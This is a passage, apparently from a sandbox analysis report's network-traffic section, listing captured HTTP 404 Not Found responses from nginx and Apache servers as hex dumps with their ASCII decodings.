65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:37:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:37:04 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:37:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:37:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:37:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:37:17 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:37:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
